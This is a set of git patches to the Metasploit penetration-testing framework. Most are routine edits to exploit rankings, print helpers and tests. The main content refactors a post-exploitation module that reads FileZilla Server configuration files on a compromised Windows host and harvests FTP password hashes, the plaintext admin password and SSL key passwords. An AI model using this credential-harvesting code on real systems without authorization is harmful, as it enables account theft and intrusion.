diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index 1436edfa05..aea994314c 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = GreatRanking
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 

From f7ce6dcc9f4175b08813e52b3ffc2ca58110320e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 02:07:18 -0500
Subject: [PATCH 0733/1013] We agreed to Normal

---
 .../exploits/multi/browser/adobe_flash_opaque_background_uaf.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index aea994314c..b4cf3de1e9 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 

From c92d0d9df614a80077c46c6a64448df94d1dd96d Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 11 Jul 2015 18:14:55 +0100
Subject: [PATCH 0734/1013] Fix FileZilla Server

---
 .../gather/credentials/filezilla_server.rb    | 307 ++++++++++--------
 1 file changed, 171 insertions(+), 136 deletions(-)

diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb
index 2d81a3929a..cfe83760cc 100644
--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -27,6 +27,7 @@ class Metasploit3 < Msf::Post
       ], self.class)
   end
 
+
   def run
     if session.type != "meterpreter"
       print_error "Only meterpreter sessions are supported by this post module"
@@ -36,11 +37,10 @@ class Metasploit3 < Msf::Post
     @progs = "#{session.sys.config.getenv('ProgramFiles')}\\"
 
     filezilla = check_filezilla
-    if filezilla != nil
-      get_filezilla_creds(filezilla)
-    end
+    get_filezilla_creds(filezilla) if filezilla != nil
   end
 
+
   def check_filezilla
     paths = []
     path = @progs + "FileZilla Server\\"
@@ -55,26 +55,28 @@ class Metasploit3 < Msf::Post
     end
 
     session.fs.dir.foreach(path) do |fdir|
-      if fdir =~ /FileZilla\sServer.*\.xml/i
-        paths << path + fdir
+      ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do|xmlfile|
+        if fdir.eql? xmlfile
+          pathtmp = File.join(path + xmlfile)
+          vprint_status("Configuration File Found: %s" % pathtmp)
+          paths << pathtmp
+        end
       end
     end
 
     if !paths.empty?
-      print_status("Found FileZilla Server")
+      print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
       print_line("")
-      paths << path + 'FileZilla Server.xml'
-      paths << path + 'FileZilla Server Interface.xml'
-
       return paths
     end
 
     return nil
   end
 
+
   def get_filezilla_creds(paths)
-    fs_xml = ""
-    fsi_xml = ""
+    fs_xml  = ""   # FileZilla Server.xml           - Settings for the local install
+    fsi_xml = ""   # FileZilla Server Interface.xml - Last server used with the interface
     credentials = Rex::Ui::Text::Table.new(
     'Header'    => "FileZilla FTP Server Credentials",
     'Indent'    => 1,
@@ -122,11 +124,27 @@ class Metasploit3 < Msf::Post
       "SSL Key Password"
     ])
 
-    file = session.fs.file.new(paths[1], "rb")
-    until file.eof?
-      fs_xml << file.read
+    lastserver = Rex::Ui::Text::Table.new(
+    'Header'    => "FileZilla FTP Last Server",
+    'Indent'    => 1,
+    'Columns'   =>
+    [
+      "IP",
+      "Port",
+      "Password"
+    ])
+
+    paths.each do|path|
+      file = session.fs.file.new(path, "rb")
+      until file.eof?
+        if path.include? "FileZilla Server.xml"
+         fs_xml << file.read
+        elsif path.include? "FileZilla Server Interface.xml"
+         fsi_xml << file.read
+        end
+      end
+      file.close
     end
-    file.close
 
     # user credentials password is just an MD5 hash
     # admin pass is just plain text. Priorities?
@@ -135,29 +153,24 @@ class Metasploit3 < Msf::Post
     creds.each do |cred|
       credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']]
 
-      if session.db_record
-        source_id = session.db_record.id
-      else
-        source_id = nil
-      end
-
+      session.db_record ? (source_id = session.db_record.id) : (source_id = nil)
 
       service_data = {
-          address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
-          port: config['ftp_port'],
-          service_name: 'ftp',
-          protocol: 'tcp',
-          workspace_id: myworkspace_id
+        address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+        port: config['ftp_port'],
+        service_name: 'ftp',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
       }
 
       credential_data = {
-          origin_type: :session,
-          jtr_format: 'raw-md5',
-          session_id: session_db_id,
-          post_reference_name: self.refname,
-          private_type: :nonreplayable_hash,
-          private_data: cred['password'],
-          username: cred['user']
+        origin_type: :session,
+        jtr_format: 'raw-md5',
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        private_type: :nonreplayable_hash,
+        private_data: cred['password'],
+        username: cred['user']
       }
 
       credential_data.merge!(service_data)
@@ -166,22 +179,63 @@ class Metasploit3 < Msf::Post
 
       # Assemble the options hash for creating the Metasploit::Credential::Login object
       login_data ={
-          core: credential_core,
-          status: Metasploit::Model::Login::Status::UNTRIED
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
       }
 
       # Merge in the service data and create our Login
       login_data.merge!(service_data)
       login = create_credential_login(login_data)
-
     end
 
     perms.each do |perm|
-    permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'], perm['filedelete'], perm['fileappend'],
-      perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate'], perm['home']]
+      permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'], perm['filedelete'], perm['fileappend'],
+        perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate'], perm['home']]
+    end
+
+    configuration << [config['ftp_port'], config['ftp_bindip'], ['admin_port'], config['admin_bindip'], config['admin_pass'],
+      config['ssl'], config['ssl_certfile'], config['ssl_keypass']]
+
+    session.db_record ? (source_id = session.db_record.id) : (source_id = nil)
+
+    # report the goods!
+    if config['ftp_port'] == "<none>"
+      vprint_status("Detected Default Adminstration Settings:")
+      config['ftp_port'] = "21"
+    else
+      vprint_status("Collected the following configuration details:")
+      service_data = {
+        address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+        port: config['admin_port'],
+        service_name: 'filezilla-admin',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        private_type: :password,
+        private_data: config['admin_pass'],
+        username: 'admin'
+      }
+
+      credential_data.merge!(service_data)
+
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data ={
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      # Merge in the service data and create our Login
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
     end
 
-    vprint_status("    Collected the following configuration details:")
     vprint_status("       FTP Port: %s" % config['ftp_port'])
     vprint_status("    FTP Bind IP: %s" % config['ftp_bindip'])
     vprint_status("            SSL: %s" % config['ssl'])
@@ -190,104 +244,69 @@ class Metasploit3 < Msf::Post
     vprint_status("     Admin Pass: %s" % config['admin_pass'])
     vprint_line("")
 
-    configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'],
-      config['ssl'], config['ssl_certfile'], config['ssl_keypass']]
-    if session.db_record
-      source_id = session.db_record.id
-    else
-      source_id = nil
-    end
-    # report the goods!
-    if config['admin_port'] == "<none>"
-      vprint_status("(No admin information found.)")
-    else
-      service_data = {
-          address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
-          port: config['admin_port'],
-          service_name: 'filezilla-admin',
-          protocol: 'tcp',
-          workspace_id: myworkspace_id
-      }
+    lastser = parse_interface(fsi_xml)
+    lastserver << [lastser['ip'], lastser['port'], lastser['password']]
 
-      credential_data = {
-          origin_type: :session,
-          session_id: session_db_id,
-          post_reference_name: self.refname,
-          private_type: :password,
-          private_data: config['admin_pass'],
-          username: 'admin'
-      }
-
-      credential_data.merge!(service_data)
-
-      credential_core = create_credential(credential_data)
-
-      # Assemble the options hash for creating the Metasploit::Credential::Login object
-      login_data ={
-          core: credential_core,
-          status: Metasploit::Model::Login::Status::UNTRIED
-      }
-
-      # Merge in the service data and create our Login
-      login_data.merge!(service_data)
-      login = create_credential_login(login_data)
-
-    end
+    vprint_status("Last Server Information:")
+    vprint_status("         IP: %s" % lastser['ip'])
+    vprint_status("       Port: %s" % lastser['port'])
+    vprint_status("   Password: %s" % lastser['password'])
+    vprint_line("")
 
     p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv,
       "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials")
-
     print_status("Credentials saved in: #{p.to_s}")
 
     p = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv,
       "filezilla_server_permissions.csv", "FileZilla FTP Server Permissions")
-
     print_status("Permissions saved in: #{p.to_s}")
 
     p = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv,
       "filezilla_server_configuration.csv", "FileZilla FTP Server Configuration")
+    print_status("     Config saved in: #{p.to_s}")
 
-    print_status("Config saved in: #{p.to_s}")
+    p = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv,
+      "filezilla_server_lastserver.csv", "FileZilla FTP Last Server")
+    print_status(" Last server history: #{p.to_s}")
+
+    print_line("")
   end
 
+
   def parse_server(data)
-    creds  = []
-    perms  = []
+    creds = []
+    perms = []
     settings = {}
     users = 0
     passwords = 0
     groups = []
     perm = {}
 
-    doc = REXML::Document.new(data).root
+    begin
+      doc = REXML::Document.new(data).root
+    rescue REXML::ParseException => e
+      print_error("Invalid xml format")
+    end
 
-    items = doc.elements.to_a("//Settings//Item/")
-    settings['ftp_port'] = items[0].text rescue "<none>"
-    settings['admin_port'] = items[16].text rescue "<none>"
-    settings['admin_pass'] = items[17].text rescue "<none>"
-    settings['local_host'] = items[18].text rescue ""
-    settings['bindip'] = items[38].text rescue ""
-    settings['ssl'] = items[42].text rescue ""
-
-    if settings['local_host'] # empty means localhost only * is 0.0.0.0
-      settings['admin_bindip'] = settings['local_host']
+    opt = doc.elements.to_a("Settings/Item")
+    if opt[1].nil?    # Default value will only have a single line, for admin port - no adminstration settings
+      settings['admin_port'] = opt[0].text rescue "<none>"
+      settings['ftp_port']   = "<none>"
     else
-      settings['admin_bindip'] = "127.0.0.1"
-    end
-    if settings['admin_bindip'] == "*"
-      settings['admin_bindip'] = "0.0.0.0"
+      settings['ftp_port']   = opt[0].text rescue "<none>"
+      settings['admin_port'] = opt[16].text rescue "<none>"
     end
+    settings['admin_pass'] = opt[17].text rescue "<none>"
+    settings['local_host'] = opt[18].text rescue ""
+    settings['bindip']     = opt[38].text rescue ""
+    settings['ssl']        = opt[42].text rescue ""
 
-    if settings['bindip']
-      settings['ftp_bindip'] = settings['bindip']
-    else
-      settings['ftp_bindip'] = "127.0.0.1"
-    end
+    # empty means localhost only * is 0.0.0.0
+    settings['local_host'] ? (settings['admin_bindip'] = settings['local_host']) : (settings['admin_bindip'] = "127.0.0.1")
+    settings['admin_bindip'] = "0.0.0.0" if settings['admin_bindip'] == "*" or settings['admin_bindip'].empty?
 
-    # make the bindip a little easier to understand
-    if settings['ftp_bindip'] == "*"
-      settings['ftp_bindip'] = "0.0.0.0"
-    end
+    settings['bindip'] ? (settings['ftp_bindip'] = settings['bindip']) : (settings['ftp_bindip'] = "127.0.0.1")
+    settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" or settings['ftp_bindip'].empty?
 
     if settings['ssl'] == "1"
       settings['ssl'] = "true"
@@ -299,7 +318,7 @@ class Metasploit3 < Msf::Post
     end
 
     settings['ssl_certfile'] = items[45].text rescue "<none>"
-    if settings['ssl_certfile'] != "<none>" and settings['ssl'] == "true" and datastore['SSLCERT'] # lets get the file if its there could be useful in MITM attacks
+    if settings['ssl_certfile'] != "<none>" and settings['ssl'] == "true" and datastore['SSLCERT']   # lets get the file if its there could be useful in MITM attacks
       sslfile = session.fs.file.new(settings['ssl_certfile'])
       until sslfile.eof?
         sslcert << sslfile.read
@@ -309,30 +328,27 @@ class Metasploit3 < Msf::Post
       print_status("Looted SSL Certificate File")
     end
 
-    if settings['ssl_certfile'].nil?
-      settings['ssl_certfile'] = "<none>"
-    end
+    settings['ssl_certfile'] = "<none>" if settings['ssl_certfile'].nil?
 
     settings['ssl_keypass'] = items[50].text rescue "<none>"
+    settings['ssl_keypass'] = "<none>" if settings['ssl_keypass'].nil?
 
-    if settings['ssl_keypass'].nil?
-      settings['ssl_keypass'] = "<none>"
-    end
+    vprint_status("Collected the following credentials:") if !doc.elements['Users'].nil?
 
-    doc.elements['Users'].elements.each('User') do |user|
+    doc.elements.each("Users/User") do |user|
       account = {}
-      account['user'] = user.attributes['Name'] rescue "<none>"
-      users += 1
-      opt = user.elements.to_a("//User//Option/")
+      opt = user.elements.to_a("Option")
+      account['user']     = user.attributes['Name'] rescue "<none>"
       account['password'] = opt[0].text rescue "<none>"
-      account['group'] = opt[1].text rescue "<none>"
+      account['group']    = opt[1].text rescue "<none>"
+      users     += 1
       passwords += 1
       groups << account['group']
 
-      user.elements.to_a("//User//Permissions//Permission").each do |permission|
-        perm['user'] = account['user'] # give some context as to which user has these permissions
+      user.elements.to_a("Permissions/Permission").each do |permission|
+        opt = permission.elements.to_a("Option")
+        perm['user'] = account['user']   # give some context as to which user has these permissions
         perm['dir'] = permission.attributes['Dir']
-        opt = permission.elements.to_a("//User//Permissions//Permission//Option")
         perm['fileread']   = opt[0].text rescue "<unknown>"
         perm['filewrite']  = opt[1].text rescue "<unknown>"
         perm['filedelete'] = opt[2].text rescue "<unknown>"
@@ -343,18 +359,14 @@ class Metasploit3 < Msf::Post
         perm['dirsubdirs'] = opt[7].text rescue "<unknown>"
         perm['autocreate'] = opt[9].text rescue "<unknown>"
 
-        if opt[8].text == "1"
-          perm['home'] = "true"
-        else
-          perm['home'] = "false"
-        end
+        opt[8].text == "1" ? (perm['home'] = "true") : (perm['home'] = "false")
+
         perms << perm
-
       end
 
-      user.elements.to_a("//User//IpFilter//Allowed").each do |allowed|
+      user.elements.to_a("IpFilter/Allowed").each do |allowed|
       end
-      user.elements.to_a("//User//IpFilter//Disallowed").each do |disallowed|
+      user.elements.to_a("IpFilter/Disallowed").each do |disallowed|
       end
 
       account['host'] = settings['ftp_bindip']
@@ -363,16 +375,16 @@ class Metasploit3 < Msf::Post
       account['ssl']  = settings['ssl']
       creds << account
 
-      vprint_status("    Collected the following credentials:")
       vprint_status("    Username: %s" % account['user'])
       vprint_status("    Password: %s" % account['password'])
-      vprint_status("       Group: %s" % account['group'])
+      vprint_status("       Group: %s" % account['group']) if account['group'] != nil
       vprint_line("")
     end
 
+    # Rather than printing out all the values, just count up
     groups = groups.uniq unless groups.uniq.nil?
     if !datastore['VERBOSE']
-      print_status("    Collected the following credentials:")
+      print_status("Collected the following credentials:")
       print_status("    Usernames: %u" % users)
       print_status("    Passwords: %u" % passwords)
       print_status("       Groups: %u" % groups.length)
@@ -381,6 +393,28 @@ class Metasploit3 < Msf::Post
     return [creds, perms, settings]
   end
 
+
+  def parse_interface(data)
+    lastser = {}
+
+    begin
+      doc = REXML::Document.new(data).root
+    rescue REXML::ParseException => e
+      print_error("Invalid xml format")
+    end
+
+    opt = doc.elements.to_a("Settings/Item")
+
+    lastser['ip']       = opt[0].text rescue "<none>"
+    lastser['port']     = opt[1].text rescue "<none>"
+    lastser['password'] = opt[2].text rescue "<none>"
+
+    lastser['password'] = "<none>" if lastser['password'] == nil
+
+    return lastser
+  end
+
+
   def got_root?
     if session.sys.config.getuid =~ /SYSTEM/
       return true
@@ -388,6 +422,7 @@ class Metasploit3 < Msf::Post
     return false
   end
 
+
   def whoami
     return session.sys.config.getenv('USERNAME')
   end

From 14d0d456f4d115350196fdea49f2ca7abd388068 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 11 Jul 2015 19:11:59 +0100
Subject: [PATCH 0735/1013] Fix FileZilla perm loot bug

---
 .../gather/credentials/filezilla_server.rb    | 26 ++++++++++---------
 1 file changed, 14 insertions(+), 12 deletions(-)

diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb
index cfe83760cc..19147e2349 100644
--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -134,6 +134,7 @@ class Metasploit3 < Msf::Post
       "Password"
     ])
 
+
     paths.each do|path|
       file = session.fs.file.new(path, "rb")
       until file.eof?
@@ -193,9 +194,6 @@ class Metasploit3 < Msf::Post
         perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate'], perm['home']]
     end
 
-    configuration << [config['ftp_port'], config['ftp_bindip'], ['admin_port'], config['admin_bindip'], config['admin_pass'],
-      config['ssl'], config['ssl_certfile'], config['ssl_keypass']]
-
     session.db_record ? (source_id = session.db_record.id) : (source_id = nil)
 
     # report the goods!
@@ -244,6 +242,10 @@ class Metasploit3 < Msf::Post
     vprint_status("     Admin Pass: %s" % config['admin_pass'])
     vprint_line("")
 
+    configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'],
+      config['ssl'], config['ssl_certfile'], config['ssl_keypass']]
+
+
     lastser = parse_interface(fsi_xml)
     lastserver << [lastser['ip'], lastser['port'], lastser['password']]
 
@@ -274,13 +276,12 @@ class Metasploit3 < Msf::Post
 
 
   def parse_server(data)
-    creds = []
-    perms = []
-    settings = {}
-    users = 0
-    passwords = 0
+    creds  = []
+    perms  = []
     groups = []
-    perm = {}
+    settings = {}
+    users     = 0
+    passwords = 0
 
     begin
       doc = REXML::Document.new(data).root
@@ -346,9 +347,10 @@ class Metasploit3 < Msf::Post
       groups << account['group']
 
       user.elements.to_a("Permissions/Permission").each do |permission|
+        perm = {}
         opt = permission.elements.to_a("Option")
-        perm['user'] = account['user']   # give some context as to which user has these permissions
-        perm['dir'] = permission.attributes['Dir']
+        perm['user']       = user.attributes['Name'] rescue "<unknown>"
+        perm['dir']        = permission.attributes['Dir'] rescue "<unknown>"
         perm['fileread']   = opt[0].text rescue "<unknown>"
         perm['filewrite']  = opt[1].text rescue "<unknown>"
         perm['filedelete'] = opt[2].text rescue "<unknown>"
@@ -358,6 +360,7 @@ class Metasploit3 < Msf::Post
         perm['dirlist']    = opt[6].text rescue "<unknown>"
         perm['dirsubdirs'] = opt[7].text rescue "<unknown>"
         perm['autocreate'] = opt[9].text rescue "<unknown>"
+        perm['host']       = settings['ftp_bindip']
 
         opt[8].text == "1" ? (perm['home'] = "true") : (perm['home'] = "false")
 
@@ -370,7 +373,6 @@ class Metasploit3 < Msf::Post
       end
 
       account['host'] = settings['ftp_bindip']
-      perm['host']    = settings['ftp_bindip']
       account['port'] = settings['ftp_port']
       account['ssl']  = settings['ssl']
       creds << account

From a4dc409c126353a74e1808e3812618b0ea46c449 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 11 Jul 2015 19:37:45 +0100
Subject: [PATCH 0736/1013] Add empty default vprint value

---
 lib/msf/core/module/ui/line/verbose.rb    |  4 ++--
 lib/msf/core/module/ui/message/verbose.rb | 10 +++++-----
 2 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/module/ui/line/verbose.rb b/lib/msf/core/module/ui/line/verbose.rb
index 399ef5c82b..cab61ff858 100644
--- a/lib/msf/core/module/ui/line/verbose.rb
+++ b/lib/msf/core/module/ui/line/verbose.rb
@@ -1,6 +1,6 @@
 module Msf::Module::UI::Line::Verbose
   # Verbose version of #print_line
-  def vprint_line(msg)
+  def vprint_line(msg='')
     print_line(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
   end
-end
\ No newline at end of file
+end
diff --git a/lib/msf/core/module/ui/message/verbose.rb b/lib/msf/core/module/ui/message/verbose.rb
index 577a3293d1..1a8d0175b9 100644
--- a/lib/msf/core/module/ui/message/verbose.rb
+++ b/lib/msf/core/module/ui/message/verbose.rb
@@ -1,21 +1,21 @@
 module Msf::Module::UI::Message::Verbose
   # Verbose version of #print_error
-  def vprint_error(msg)
+  def vprint_error(msg='')
     print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
   end
 
   # Verbose version of #print_good
-  def vprint_good(msg)
+  def vprint_good(msg='')
     print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
   end
 
   # Verbose version of #print_status
-  def vprint_status(msg)
+  def vprint_status(msg='')
     print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
   end
 
   # Verbose version of #print_warning
-  def vprint_warning(msg)
+  def vprint_warning(msg='')
     print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
   end
-end
\ No newline at end of file
+end

From d795b2f831775c1ba83606918292fa7fd9e91f86 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 11 Jul 2015 19:40:21 +0100
Subject: [PATCH 0737/1013] Module cleanup

---
 modules/auxiliary/scanner/http/jenkins_enum.rb                | 2 +-
 modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb | 2 +-
 modules/post/multi/manage/dbvis_add_db_admin.rb               | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb
index 099f7eca03..8a5a866338 100644
--- a/modules/auxiliary/scanner/http/jenkins_enum.rb
+++ b/modules/auxiliary/scanner/http/jenkins_enum.rb
@@ -221,6 +221,6 @@ class Metasploit3 < Msf::Auxiliary
     # Report a jenkins information note for future analysis, tied to this service
     report_note(:host => rhost, :port => rport, :proto => 'tcp', :ntype => 'jenkins.info', :data => jinfo)
 
-    vprint_line('')
+    vprint_line
   end
 end
diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb
index a46d2ab2ec..82b8f3d7f4 100644
--- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb
+++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    vprint_line("")
+    vprint_line
     vprint_line(res.body)
 
     f = ::File.basename(fname)
diff --git a/modules/post/multi/manage/dbvis_add_db_admin.rb b/modules/post/multi/manage/dbvis_add_db_admin.rb
index a361bf1886..eb8d5f1956 100644
--- a/modules/post/multi/manage/dbvis_add_db_admin.rb
+++ b/modules/post/multi/manage/dbvis_add_db_admin.rb
@@ -208,7 +208,7 @@ class Metasploit3 < Msf::Post
         dbvis = "\"#{dbvis}\""
         cmd = "#{dbvis} #{args}"
         resp = cmd_exec(cmd)
-        vprint_line("")
+        vprint_line
         vprint_status("#{resp}")
         if resp =~ /denied|failed/i
           error = true

From b2d723e4a3083d4a4d5c0fe937deef7cd17a167d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 19:13:20 -0500
Subject: [PATCH 0738/1013] Rspec

---
 .../core/exploit/browser_autopwnv2_spec.rb    | 68 +++++++++++++++++--
 1 file changed, 63 insertions(+), 5 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index 8b87348d19..b49b151d8e 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -11,7 +11,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
 
 
   def mock_note_destroy
-    # The destory method doesn't pass the note as an argument like framework.jobs_stop_job.
+    # The destory method doesn't pass the note as an argument startlike framework.jobs_stop_job.
     # So here's I'm just gonna clear them all, and that sort of mimics #destroy.
     framework = double('Msf::Framework', datastore: {})
 
@@ -91,6 +91,19 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     mod
   end
 
+  def create_fake_multi_handler
+    compat_payloads = [
+      [windows_meterpreter_reverse_tcp, create_fake_windows_meterpreter]
+    ]
+
+    create_fake_exploit(
+      full_name: 'multi/handler',
+      short_name: 'multi/handler',
+      compat_payloads: compat_payloads,
+      job_id: 0,
+    )
+  end
+
   def create_fake_ms14_064
     compat_payloads = [
       [windows_meterpreter_reverse_tcp, create_fake_windows_meterpreter]
@@ -168,6 +181,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     allow(p).to receive(:fullname).and_return(fullname)
     allow(p).to receive(:shoftname).and_return(shortname)
     allow(p).to receive(:workspace).and_return(workspace)
+    allow(p).to receive(:exploit_simple)
 
     p
   end
@@ -238,6 +252,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
       exploits << create_fake_ms14_064
       exploits << create_fake_flash_uncompress_zlib_uaf
       exploits << create_fake_flash_net_connection_confusion
+      exploits << create_fake_multi_handler
 
       exploits
     }.call
@@ -382,6 +397,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     mod.send(:initialize)
     mod.send(:datastore=, autopwn_datastore_options)
     allow(mod).to receive(:fullname).and_return('multi/browser/autopwn')
+    allow(mod).to receive(:datastore).and_return(autopwn_datastore_options)
     mod
   end
 
@@ -561,7 +577,30 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  skip '#start_payload_listeners' do
+  describe '#start_payload_listeners' do
+    let(:active_payload) do
+      create_fake_windows_meterpreter
+    end
+
+    let(:wanted_payloads) do
+      [{
+        payload_name: active_payload.fullname,
+        payload_lport: active_payload.datastore['LPORT']
+      }]
+    end
+
+    before(:each) do
+      subject.instance_variable_set(:@wanted_payloads, wanted_payloads)
+      subject.instance_variable_set(:@payload_job_ids, [])
+    end
+
+    context 'when a payload is listening' do
+      it 'adds the job ID to the payload job ID list' do
+        expect(subject.instance_variable_get(:@payload_job_ids).length).to eq(0)
+        subject.start_payload_listeners
+        expect(subject.instance_variable_get(:@payload_job_ids).length).to eq(1)
+      end
+    end
   end
 
   describe '#parse_rank' do
@@ -656,8 +695,20 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  skip '#select_payload' do
-    
+  describe '#select_payload' do
+    before(:each) do
+      subject.instance_variable_set(:@wanted_payloads, [])
+    end
+
+    context 'when a ms14_064 is given' do
+      it 'returns a windows payload' do
+        m = create_fake_ms14_064
+        expected_payload = m.compatible_payloads.first.first
+        selected_payload = subject.select_payload(m)
+        expect(selected_payload.length).to eq(1)
+        expect(selected_payload.first[:payload_name]).to eq(expected_payload)
+      end
+    end
   end
 
   describe '#start_exploits' do
@@ -724,7 +775,14 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
 
     skip '#start_service' do
-      # You got me, I don't know how to implement this one because the super"
+      it 'prints the BrowserAutopwn URL' do
+        # This code blows up, por que??
+        # 3 threads exist(s) when only 1 thread expected after suite runs
+        allow_any_instance_of(Msf::Exploit::Remote::BrowserExploitServer).to receive(:super)
+        allow(subject).to receive(:show_ready_exploits)
+        allow_any_instance_of(Rex::Socket).to receive(:source_address).and_return(nil)
+        subject.start_service
+      end
     end
 
   end

From 881967452285c408f6545acd3a2fd6519e345096 Mon Sep 17 00:00:00 2001
From: h00die <mike@shorebreaksecurity.com>
Date: Sat, 11 Jul 2015 21:03:02 -0400
Subject: [PATCH 0739/1013] updated per feedback from PR

---
 modules/exploits/multi/http/werkzeug_debug_rce.rb | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
index 3a9433fcf7..3ed9af96a4 100644
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -19,7 +19,8 @@ class Metasploit4 < Msf::Exploit::Remote
         machines", but sometimes slips passed testing.
         Tested against:
             0.9.6 on Debian
-            0.10  on CentOS
+            0.9.6 on Centos
+            0.10  on Debian
       },
       'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
       'References'  =>
@@ -45,8 +46,8 @@ class Metasploit4 < Msf::Exploit::Remote
         'method'   => 'GET',
         'uri'      => normalize_uri(datastore['URI'])
     })
-    #https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/debug/tbtools.py#L67
-    if (res and res.body =~ /Brought to you by <strong class="arthur">DON'T PANIC<\/strong>, your\n        friendly Werkzeug powered traceback interpreter./)
+    #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
